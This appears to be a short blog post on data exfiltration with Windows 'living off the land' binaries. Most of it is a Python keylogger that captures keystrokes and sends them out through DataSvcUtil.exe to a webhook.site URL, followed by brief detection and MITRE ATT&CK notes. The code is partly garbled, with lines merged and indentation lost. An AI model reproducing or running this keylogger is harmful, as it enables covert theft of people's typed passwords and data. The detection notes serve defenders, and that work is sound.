Data Exfiltration with LOLBins

When it comes to data exfiltration, creativity and thinking outside the box is the most important. To remember; The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Greaber to explain the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts. [see more]

/uri:serviceuri — At this point you need to insert the URL containing the data that will be exfiltrated
Event with webhook.site
# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocessURL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"
content = ""def on_press(key):
global content
global URL
global uploader
if str(key) == 'Key.backspace':
content += ' '
else:
content += str(key)print(f'last key: {str(key)}')
print("")if str(key) == 'Key.enter':
upload_url = (f'{URL}?{content}')
subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
buffer = ''if key == 0x03:
sys.exit(0)if __name__ == "__main__":
try:
with Listener(on_press=on_press) as listener:
listener.join()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
  • Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.exe
  • Sub-techniques: T1567.001, T1567.002
  • Tactic: Exfiltration
  • Requires Network: Yes
  • Platforms: Linux, Windows, macOS
  • Data Sources: Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection

reverse engineering and malware tales\\ Linkedin@isdebuggerpresent\\

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store